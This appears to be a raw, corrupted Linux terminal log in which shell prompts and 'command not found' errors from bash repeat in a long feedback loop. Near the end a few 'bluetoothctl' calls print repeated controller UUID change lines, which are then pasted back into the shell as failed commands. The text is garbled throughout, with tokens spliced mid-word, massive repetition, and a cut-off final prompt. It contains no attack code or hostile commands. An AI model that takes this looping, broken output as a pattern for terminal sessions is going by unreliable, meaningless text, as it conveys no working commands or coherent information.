+[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command n[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command n +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +clear +bluetoothctl +bluetoothctl +bluetoothctl +[[HG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controllroller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 Class: 0x0c010c +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb +[CHG] Controller CCControllerController C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHG] Controller] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 Pairable: yes +[CHG] Controller C8:F7:33:33:E2:F7 Class: 0x08010c +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +[CHGor@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalad[CHG]:shshbash: [CHG]: command not found +[[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +bash:bash: [CHG]: command not found +[bash: [CHG]: command not found +[bash: [CHG]: command not found +[[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001800-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001200-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [CHG]: command not found +[goalador@gatanda 